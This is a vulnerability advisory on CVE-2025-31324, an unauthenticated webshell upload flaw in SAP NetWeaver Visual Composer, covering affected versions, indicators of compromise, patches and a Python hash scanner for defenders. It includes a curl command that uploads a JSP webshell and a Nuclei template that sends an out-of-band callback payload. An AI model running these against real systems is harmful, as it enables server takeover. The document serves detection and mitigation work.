CVE-2025-31324: Remote Code Execution in SAP NetWeaver Visual Composer

Introduction
CVE-2025-31324, published on the NVD on April 24, 2025, is a critical flaw in the Metadata Uploader component of SAP NetWeaver Visual Composer. Initially identified by ReliaQuest on April 22, 2025, as reported in their blog, it allows unauthenticated attackers to upload malicious files, resulting in remote code execution (RCE).
With a CVSS 3.1 score of 10.0, the vulnerability has a severe impact, potentially leading to the complete compromise of the confidentiality, integrity, and availability of affected systems. Evidence of active exploitation since January 20, 2025, as documented by Onapsis, characterizes it as a zero-day vulnerability. CISA included the flaw in its Known Exploited Vulnerabilities Catalog on April 29, 2025, reinforcing the urgency of mitigation.
Affected Versions
The vulnerability affects the SAP Visual Composer (VCFRAMEWORK) component in all versions of SAP NetWeaver 7.xx (all Support Packs – SPS), which operates on the NetWeaver Java stack.
Specifically, the vulnerable component is the Metadata Uploader, present at the /developmentserver/metadatauploader endpoint. Although Visual Composer is not installed by default, it is widely enabled, with estimates suggesting that 50% to 70% of NetWeaver Java systems are potentially vulnerable, according to Hackread.
Table of Affected Versions
| Product | Version | Affected Component | Notes |
|---|---|---|---|
| SAP NetWeaver | 7.xx (all SPS) | Visual Composer (Metadata Uploader) | Requires VCFRAMEWORK component installed |
Technical Details
The flaw lies in the Metadata Uploader component, which does not validate the identity or permissions of the user when processing upload requests at the /developmentserver/metadatauploader endpoint. This allows unauthenticated attackers to send executable files, such as JSP webshells, to publicly accessible directories, resulting in RCE.
Exploitation Process
The attack occurs via HTTP POST requests to the /developmentserver/metadatauploader endpoint. An attacker can send a malicious file, such as a JSP webshell, which is stored in directories such as /usr/sap/<SID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root.
A hypothetical example of exploitation using curl would be:
```bash
curl -X POST -F "file=@webshell.jsp" "http://<target>/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1"
```
After the upload, the webshell can be accessed via a GET request at http://<target>/irj/webshell.jsp, allowing the execution of arbitrary commands on the server.
Public Exploits
Although full exploits are not widely available, the ease of detection and exploitation of the vulnerability serves as a warning to organizations.
Onapsis has made an open-source scanner available on GitHub to check for the presence of the vulnerable component, patch status, and known webshells. RedRays also published a scanner that detects the vulnerability and malicious files.
Additionally, a Nuclei template for the CVE is already available, allowing for mass detection of currently vulnerable applications.
```yaml
id: CVE-2025-31324

info:
  name: SAP NetWeaver Visual Composer Metadata Uploader - Deserialization
  author: iamnoooob,rootxharsh,parthmalhotra,pdresearch
  severity: critical
  description: |
    SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.
  reference:
    - https://www.bleepingcomputer.com/news/security/sap-fixes-suspected-netweaver-zero-day-exploited-in-attacks/
    - https://www.theregister.com/2025/04/25/sap_netweaver_patch/
    - https://me.sap.com/notes/3594142
    - https://url.sap/sapsecuritypatchday
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cve-id: CVE-2025-31324
    cwe-id: CWE-434
    epss-score: 0.00043
    epss-percentile: 0.12532
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"SAP NetWeaver Application Server Java"
  tags: cve,cve2025,sap,netweaver,rce,deserialization

variables:
  oast: ".{{interactsh-url}}"
  payload: "{{padding(oast,'a',54,'prefix')}}"

http:
  - raw:
      - |
        POST /developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data

        {{zip('.properties',replace(base64_decode('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'),'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa',payload))}}

    matchers:
      - type: dsl
        dsl:
          - contains(interactsh_protocol, 'dns')
          - contains_all(body, 'FAILED', 'Cause')
        condition: and
# digest: 4a0a00473045022100f5b505da6330ce6f914842169ea999457eb6ccd6702d7f10011b8b67aabd107b02203d3504d0f406612d5ccbdde93d7c452e029e4393550688a47e9410d9ce68425a:922c64590222798bb761d5b6d8e72950
```
Indicators of Compromise (IoCs)
Onapsis identified the following IoCs to detect compromised systems:
Suspicious files:
.jsp, .java, or .class files in /usr/sap/<SID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root, /work or /work/sync.
Known hashes:
helper.jsp: SHA-256 1f72bd2643995fab4ecf7150b6367fa1b3fab17afd2abed30a98f075e4913087
cache.jsp: SHA-256 794cb0a92f51e1387a6b316b8b5ff83d33a51ecf9bf7cc8e88a619ecb64f1dcf
Files with random 8 character names (example: [a-z]{8}.jsp): SHA-256 b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee
Exploitation Requirements
Endpoint: Access to the /developmentserver/metadatauploader endpoint via HTTP/HTTPS, with no authentication required.
MITRE ATT&CK Techniques: T1190 (Exploit Public-Facing Application), T1505.003 (Server Software Component: Web Shell).
Mitigations
Official Patch
SAP released an emergency patch in SAP Security Note 3594142, available to customers on the support portal. Immediate application of the patch is the recommended solution to eliminate the vulnerability.
Temporary Measures
Until the patch is applied, the following actions can reduce risk:
Restrict Access: Configure firewall rules or use SAP security features to block requests to the /developmentserver/metadatauploader endpoint.
Disable Visual Composer: If the component is not essential, disable it to eliminate the attack surface.
Monitoring and Detection: Forward logs to a SIEM system and scan directories such as /usr/sap/<SID>/j2ee/cluster/apps/sap.com/irj/servlet_jsp/irj/root for unauthorized files, verifying the mentioned hashes.
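The directory scan called for in the Monitoring and Detection item, using the file types, name pattern and SHA-256 values from the Indicators of Compromise section, can be scripted as follows. This is an added example, not the Onapsis or RedRays scanner and not code from the original article; it assumes that /work and /work/sync sit next to root under .../servlet_jsp/irj, and the function and constant names are illustrative.

```python
import hashlib
import re
import sys
from pathlib import Path

# SHA-256 values listed in the IoC section of this page.
KNOWN_SHA256 = {
    "1f72bd2643995fab4ecf7150b6367fa1b3fab17afd2abed30a98f075e4913087": "helper.jsp",
    "794cb0a92f51e1387a6b316b8b5ff83d33a51ecf9bf7cc8e88a619ecb64f1dcf": "cache.jsp",
    "b3e4c4018f2d18ec93a62f59b5f7341321aff70d08812a4839b762ad3ade74ee": "random-name .jsp",
}
SUSPICIOUS_EXT = {".jsp", ".java", ".class"}
RANDOM_NAME = re.compile(r"^[a-z]{8}\.jsp$")
# Assumption: IoC directories are relative to .../servlet_jsp/irj
IOC_SUBDIRS = ("root", "work", "work/sync")


def sha256_of(path, chunk=1 << 20):
    """Hash a file in chunks so large files do not load into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def scan(irj_dir, known=KNOWN_SHA256):
    """Return (relative_path, sha256, reasons) for files directly in the IoC dirs."""
    irj_dir = Path(irj_dir)
    findings = []
    for sub in IOC_SUBDIRS:
        directory = irj_dir / sub
        if not directory.is_dir():
            continue
        for f in sorted(p for p in directory.iterdir() if p.is_file()):
            digest = sha256_of(f)
            reasons = []
            if digest in known:  # hash match holds even if the file was renamed
                reasons.append("known hash: " + known[digest])
            if f.suffix.lower() in SUSPICIOUS_EXT:
                reasons.append("suspicious extension")
            if RANDOM_NAME.match(f.name):
                reasons.append("random 8-character name")
            if reasons:
                findings.append((f.relative_to(irj_dir).as_posix(), digest, reasons))
    return findings


if __name__ == "__main__" and len(sys.argv) > 1:
    for rel, digest, reasons in scan(sys.argv[1]):
        print(rel, digest, "; ".join(reasons))
```

Run it with the path to .../servlet_jsp/irj as the only argument; a file flagged only by extension still needs review even when its hash is not on the list.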
Conclusion
CVE-2025-31324 represents a critical threat due to its ability to allow full control over SAP NetWeaver systems without authentication, with active exploitation confirmed since January 2025. Its inclusion in the CISA Known Exploited Vulnerabilities Catalog and its CVSS 10.0 score highlight the need for immediate action. Organizations should prioritize applying the patch from SAP Security Note 3594142, implement temporary measures, and monitor systems for signs of compromise.
References
BleepingComputer - SAP fixes suspected NetWeaver zero-day exploited in attacks
Onapsis - Active Exploitation of SAP Zero-Day Vulnerability (CVE-2025-31324)
ReliaQuest - Threat Spotlight: ReliaQuest Uncovers Vulnerability Behind SAP NetWeaver Compromise
Hackread - SAP NetWeaver Flaw Exploited to Deploy Web Shells





